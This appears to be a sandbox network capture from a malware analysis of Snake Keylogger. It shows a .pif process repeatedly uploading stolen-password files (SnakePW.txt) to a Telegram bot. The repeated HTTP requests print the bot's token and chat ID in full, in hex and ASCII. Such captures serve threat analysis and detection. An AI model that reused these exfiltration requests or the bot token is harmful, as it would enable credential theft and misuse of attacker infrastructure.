                                                                                                                2024-11-26 07:26:37 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389028,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                97192.168.2.750031149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:39 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1197e49d4113
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:39 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 39 37 65 34 39 64 34 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1197e49d4113Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:39 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:39 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389031,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                98192.168.2.750033149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:39 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11aa88ccb890
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:39 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 61 61 38 38 63 63 62 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd11aa88ccb890Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:39 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:39 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389032,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                99192.168.2.750032149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:39 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd13bb487a2aa3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:39 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 33 62 62 34 38 37 61 32 61 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd13bb487a2aa3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:39 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:39 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389033,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                100192.168.2.750040149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:41 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11dc4fb6d2d1
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:41 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 64 63 34 66 62 36 64 32 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd11dc4fb6d2d1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:41 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:41 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389038,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                101192.168.2.750039149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:41 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11c811aae335
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:41 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 63 38 31 31 61 61 65 33 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd11c811aae335Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:41 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:41 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389039,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                102192.168.2.750041149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:41 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1423a1fed966
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:41 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 32 33 61 31 66 65 64 39 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1423a1fed966Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:41 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:41 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 36 30 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389040,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                103192.168.2.750047149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:43 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12345456dd07
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:43 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 33 34 35 34 35 36 64 64 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd12345456dd07Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:44 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
